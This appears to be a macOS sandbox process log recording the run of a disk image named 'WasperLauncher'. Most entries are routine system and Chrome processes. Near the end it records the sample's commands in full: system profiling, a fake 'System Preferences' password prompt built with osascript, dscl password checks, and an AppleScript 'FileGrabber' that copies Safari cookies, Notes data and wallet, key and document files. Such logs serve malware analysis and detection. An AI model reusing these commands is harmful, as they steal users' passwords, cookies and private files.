PID:555

/usr/sbin/spindump
/usr/sbin/spindump
3⤵
PID:555

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --extension-process --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=20" "--launch-time-ticks=317635028" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=75"
3⤵
PID:559

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon
3⤵
PID:566

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon
3⤵
PID:567

/usr/libexec/xpcproxy
xpcproxy com.apple.CryptoTokenKit.setoken 306
3⤵
PID:568

/System/Library/Frameworks/CryptoTokenKit.framework/PlugIns/setoken.appex/Contents/MacOS/setoken
/System/Library/Frameworks/CryptoTokenKit.framework/PlugIns/setoken.appex/Contents/MacOS/setoken
3⤵
PID:568

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
3⤵
PID:569

/usr/libexec/xpcproxy
xpcproxy com.apple.appkit.xpc.openAndSavePanelService 489
3⤵
PID:570

/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/com.apple.appkit.xpc.openAndSavePanelService.xpc/Contents/MacOS/com.apple.appkit.xpc.openAndSavePanelService
/System/Library/Frameworks/AppKit.framework/Versions/C/XPCServices/com.apple.appkit.xpc.openAndSavePanelService.xpc/Contents/MacOS/com.apple.appkit.xpc.openAndSavePanelService
3⤵
PID:570

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.QuickLookUIService 570
3⤵
PID:571

/System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuickLookUI.framework/Versions/A/XPCServices/QuickLookUIService.xpc/Contents/MacOS/QuickLookUIService
/System/Library/Frameworks/Quartz.framework/Versions/A/Frameworks/QuickLookUI.framework/Versions/A/XPCServices/QuickLookUIService.xpc/Contents/MacOS/QuickLookUIService
3⤵
PID:571

/usr/libexec/xpcproxy
xpcproxy com.apple.automountd
3⤵
PID:572

/usr/libexec/automountd
automountd
3⤵
PID:572

/usr/libexec/od_user_homes
/usr/libexec/od_user_homes .localized
4⤵
PID:573

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
3⤵
PID:569

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
3⤵
PID:577

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
3⤵
PID:577

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=92"
3⤵
PID:578

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=92"
3⤵
PID:579

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=112"
3⤵
PID:580

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=115"
3⤵
PID:581

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=25" "--launch-time-ticks=362197876" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=112"
3⤵
PID:582

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=112"
3⤵
PID:585

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=112"
3⤵
PID:587

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=116"
3⤵
PID:589

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=audio.mojom.AudioService" "--lang=en-GB" "--service-sandbox-type=audio" --message-loop-type-ui "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=115"
3⤵
PID:590

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=115"
3⤵
PID:591

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=116"
3⤵
PID:592

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=116"
3⤵
PID:594

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=123"
3⤵
PID:595

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper (Renderer).app/Contents/MacOS/Google Chrome Helper (Renderer)" "--type=renderer" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed "--lang=en-GB" "--num-raster-threads=1" --enable-zero-copy --enable-gpu-memory-buffer-compositor-resources "--renderer-client-id=34" "--launch-time-ticks=420647989" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=116"
3⤵
PID:596

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=123"
3⤵
PID:598

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
3⤵
PID:599

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
3⤵
PID:599

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=75"
3⤵
PID:600

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=123"
3⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.DiskImageMounter.2136
3⤵
PID:602

/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter
/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter
3⤵
PID:602

/usr/libexec/xpcproxy
xpcproxy com.apple.metadata.mdwrite
3⤵
PID:603

/usr/libexec/xpcproxy
xpcproxy com.apple.hdiejectd
3⤵
PID:604

/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd
3⤵
PID:604

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=123"
3⤵
PID:605

/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 95F5978A-03FE-419E-A44A-42B2D24A14DA
3⤵
PID:606

/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 95F5978A-03FE-419E-A44A-42B2D24A14DA -post-exec 4
3⤵
PID:607

/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/Resources/DiskImages UI Agent.app/Contents/MacOS/DiskImages UI Agent
"/System/Library/PrivateFrameworks/DiskImages.framework/Versions/A/Resources/DiskImages UI Agent.app/Contents/MacOS/DiskImages UI Agent" 95F5978A-03FE-419E-A44A-42B2D24A14DA
3⤵
PID:608

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=75"
3⤵
PID:610

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
3⤵
PID:611

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
3⤵
PID:612

/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
3⤵
PID:613

/sbin/fsck_hfs
/sbin/fsck_hfs -f -n /dev/disk3s1
3⤵
PID:614

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly
3⤵
PID:615

/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s1
3⤵
PID:616

/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s1
3⤵
PID:617

/sbin/mount
/sbin/mount -t hfs -o "-u=502,-g=20,-m=755,nodev,noowners,nosuid,rdonly,quarantine" /dev/disk3s1 /Volumes/WasperLauncher
3⤵
PID:618

/sbin/mount_hfs
/sbin/mount_hfs -u 502 -g 20 -m 755 -o nodev -o noowners -o nosuid -o rdonly -o quarantine /dev/disk3s1 /Volumes/WasperLauncher
4⤵
PID:619

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
3⤵
PID:621

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
3⤵
PID:621

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,5865894457966772445,10372115258068767724,131072" "--seatbelt-client=75"
3⤵
PID:622

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
3⤵
PID:623

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
3⤵
PID:623

/usr/libexec/xpcproxy
xpcproxy com.apple.quicklook.ui.helper
3⤵
PID:624

/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
/System/Library/Frameworks/Quartz.framework/Frameworks/QuickLookUI.framework/Resources/QuickLookUIHelper.app/Contents/MacOS/QuickLookUIHelper
3⤵
PID:624

/usr/libexec/xpcproxy
xpcproxy com.apple.xpc.launchd.oneshot.0x10000001.Terminal
3⤵
PID:625

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal -psn_0_192559
3⤵
PID:625

/usr/bin/login
login -pf run
4⤵
PID:627

/bin/zsh
-zsh
5⤵
PID:632

/usr/libexec/path_helper
/usr/libexec/path_helper -s
6⤵
PID:634

/usr/bin/locale
locale LC_CTYPE
6⤵
PID:635

/usr/bin/login
login -pf run
4⤵
PID:629

/bin/zsh
-zsh
5⤵
PID:630

/usr/libexec/path_helper
/usr/libexec/path_helper -s
6⤵
PID:631

/usr/bin/locale
locale LC_CTYPE
6⤵
PID:633

/Volumes/WasperLauncher/WasperLauncher
/Volumes/WasperLauncher/WasperLauncher
6⤵
PID:636

/usr/libexec/xpcproxy
xpcproxy com.apple.XprotectFramework.AnalysisService 509
3⤵
PID:626

/System/Library/PrivateFrameworks/XprotectFramework.framework/Versions/A/XPCServices/XprotectService.xpc/Contents/MacOS/XprotectService
/System/Library/PrivateFrameworks/XprotectFramework.framework/Versions/A/XPCServices/XprotectService.xpc/Contents/MacOS/XprotectService
3⤵
PID:626

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
3⤵
PID:628

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
3⤵
PID:628

/bin/sh
sh -c "mkdir /Users/run/84935461"
3⤵
PID:637

/bin/bash
sh -c "mkdir /Users/run/84935461"
3⤵
PID:637

/bin/mkdir
mkdir /Users/run/84935461
3⤵
PID:637

/bin/sh
sh -c sw_vers
3⤵
PID:638

/bin/bash
sh -c sw_vers
3⤵
PID:638

/usr/bin/sw_vers
sw_vers
3⤵
PID:638

/bin/sh
sh -c "system_profiler SPHardwareDataType"
3⤵
PID:639

/bin/bash
sh -c "system_profiler SPHardwareDataType"
3⤵
PID:639

/usr/sbin/system_profiler
system_profiler SPHardwareDataType
3⤵
PID:639

/bin/sh
sh -c "system_profiler SPDisplaysDataType"
3⤵
PID:641

/bin/bash
sh -c "system_profiler SPDisplaysDataType"
3⤵
PID:641

/usr/sbin/system_profiler
system_profiler SPDisplaysDataType
3⤵
PID:641

/bin/sh
sh -c "dscl /Local/Default -authonly run \"\""
3⤵
PID:643

/bin/bash
sh -c "dscl /Local/Default -authonly run \"\""
3⤵
PID:643

/usr/bin/dscl
dscl /Local/Default -authonly run
3⤵
PID:643

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
3⤵
PID:644

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
3⤵
PID:644

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
3⤵
PID:644

/bin/sh
sh -c /usr/sbin/kextstat
3⤵
PID:645

/bin/bash
sh -c /usr/sbin/kextstat
3⤵
PID:645

/usr/sbin/kextstat
/usr/sbin/kextstat
3⤵
PID:645

/bin/sh
sh -c "dscl /Local/Default -authonly run root"
3⤵
PID:646

/bin/bash
sh -c "dscl /Local/Default -authonly run root"
3⤵
PID:646

/usr/bin/dscl
dscl /Local/Default -authonly run root
3⤵
PID:646

/bin/sh
sh -c "mkdir -p '/Users/run/84935461/Gecko/Firefox'"
3⤵
PID:647

/bin/bash
sh -c "mkdir -p '/Users/run/84935461/Gecko/Firefox'"
3⤵
PID:647

/bin/mkdir
mkdir -p /Users/run/84935461/Gecko/Firefox
3⤵
PID:647

/bin/sh
sh -c "mkdir -p '/Users/run/84935461/Chromium/Chrome'"
3⤵
PID:648

/bin/bash
sh -c "mkdir -p '/Users/run/84935461/Chromium/Chrome'"
3⤵
PID:648

/bin/mkdir
mkdir -p /Users/run/84935461/Chromium/Chrome
3⤵
PID:648

/bin/sh
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"84935461\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"84935461:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
3⤵
PID:649

/bin/bash
sh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"84935461\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"84935461:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"
3⤵
PID:649

/usr/bin/osascript
osascript -e "set baseFolderPath to (path to home folder as text) & \"84935461\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"84935461:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"
3⤵
PID:649

/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper
